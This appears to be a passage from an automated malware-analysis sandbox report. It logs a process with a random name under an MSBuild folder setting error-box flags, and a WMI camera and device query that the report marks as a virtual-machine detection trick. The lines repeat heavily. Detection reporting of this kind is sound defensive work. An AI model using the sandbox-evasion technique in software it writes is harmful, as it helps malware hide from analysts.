                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
